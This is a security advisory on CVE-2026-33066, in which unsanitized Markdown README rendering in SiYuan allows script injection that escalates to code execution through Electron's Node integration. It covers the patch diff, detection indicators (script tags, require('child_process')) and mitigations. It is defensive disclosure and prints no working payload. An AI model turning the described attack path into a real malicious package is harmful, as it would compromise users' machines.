CVE-2026-33066 Overview
CVE-2026-33066 is a Cross-Site Scripting (XSS) vulnerability in SiYuan, a personal knowledge management system developed by B3log. The vulnerability exists in the backend renderREADME function which uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. When the frontend assigns the rendered HTML to innerHTML without additional sanitization, malicious JavaScript embedded in package README files executes in the user's browser context.
This vulnerability is particularly dangerous because SiYuan's Electron configuration enables nodeIntegration: true with contextIsolation: false, allowing the XSS to escalate directly to full Remote Code Execution (RCE) on the victim's system.
Critical Impact
A malicious package author can embed arbitrary JavaScript in their README that executes when a user views package details, escalating to full system compromise via Electron's Node.js integration.
Affected Products
- B3log SiYuan versions 3.6.0 and below
Discovery Timeline
- 2026-03-20 - CVE-2026-33066 published to NVD
- 2026-03-23 - Last updated in NVD database
Technical Details for CVE-2026-33066
Vulnerability Analysis
This vulnerability represents a classic failure in sanitization controls within a Markdown rendering pipeline. The renderPackageREADME function in SiYuan's kernel processes Markdown content from package README files but neglects to enable HTML sanitization in the Lute Markdown engine. This allows malicious actors to embed raw HTML and JavaScript directly within Markdown documents.
The attack surface is significantly expanded by the application's Electron configuration. With nodeIntegration: true and contextIsolation: false, any JavaScript code executing in the renderer process has direct access to Node.js APIs. This architectural decision transforms what would typically be a client-side XSS issue into a severe Remote Code Execution vulnerability, enabling attackers to execute arbitrary system commands, access the filesystem, and fully compromise the victim's machine.
Root Cause
The root cause is the missing SetSanitize(true) call on the Lute Markdown engine instance in the renderPackageREADME function. The Lute library provides built-in HTML sanitization capabilities, but these must be explicitly enabled. Without this sanitization, any HTML tags including <script> elements pass through the Markdown rendering process unmodified and are subsequently rendered in the Electron application's DOM via innerHTML assignment.
Attack Vector
The attack vector is network-based and requires low privileges. An attacker can create a malicious package with a crafted README file containing embedded JavaScript. When a victim browses the package marketplace and clicks to view the malicious package's details, the JavaScript payload executes automatically. Due to Electron's insecure configuration, this JavaScript can leverage Node.js APIs to achieve arbitrary code execution on the victim's system.
// Security patch showing the fix - Source: GitHub Commit
func renderPackageREADME(linkBase string, mdData []byte) (ret string) {
mdData = bytes.TrimPrefix(mdData, []byte("\\xef\\xbb\\xbf")) // 移除文件开头的 BOM
luteEngine := lute.New()
+ luteEngine.SetSanitize(true)
luteEngine.SetSoftBreak2HardBreak(false)
luteEngine.SetCodeSyntaxHighlight(false)
luteEngine.SetLinkBase(linkBase)
Source: GitHub Commit b382f50e
Detection Methods for CVE-2026-33066
Indicators of Compromise
- Unexpected outbound network connections originating from the SiYuan Electron process
- Suspicious child process spawning from the SiYuan application
- README files containing <script> tags, onclick handlers, or other event-based XSS payloads
- Evidence of Node.js API usage in browser-side code such as require('child_process') or fs module calls
Detection Strategies
- Monitor for HTML content containing script tags or JavaScript event handlers in package README files
- Implement Content Security Policy (CSP) violations logging to detect inline script execution attempts
- Analyze application logs for unusual package download or viewing patterns that may indicate exploitation attempts
Monitoring Recommendations
- Enable process monitoring to detect unusual child processes spawned by the SiYuan Electron application
- Configure network monitoring to identify suspicious outbound connections from the application
- Implement file integrity monitoring on the SiYuan installation directory and user data folders
How to Mitigate CVE-2026-33066
Immediate Actions Required
- Upgrade SiYuan to version 3.6.1 or later immediately
- Avoid viewing package details from untrusted or unknown sources until patched
- Review recently installed packages for suspicious README content
- Consider temporarily disabling package marketplace access if upgrade is not immediately possible
Patch Information
The vulnerability was patched in SiYuan version 3.6.1. The fix adds SetSanitize(true) to the Lute Markdown engine configuration in the renderPackageREADME function, ensuring that raw HTML is properly sanitized before rendering. Users should upgrade to version 3.6.1 or later to remediate this vulnerability. The security patch is documented in the GitHub Security Advisory GHSA-4663-4mpg-879v.
Workarounds
- Disable or restrict access to the package marketplace functionality until the upgrade can be applied
- Implement network-level controls to block access to untrusted package repositories
- Use application sandboxing or containerization to limit potential impact of exploitation
# Verify SiYuan version to ensure patched version is installed
# Check application version in SiYuan settings or about dialog
# Ensure version is 3.6.1 or higher
# If using container deployment, update to latest image
docker pull b3log/siyuan:latest
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
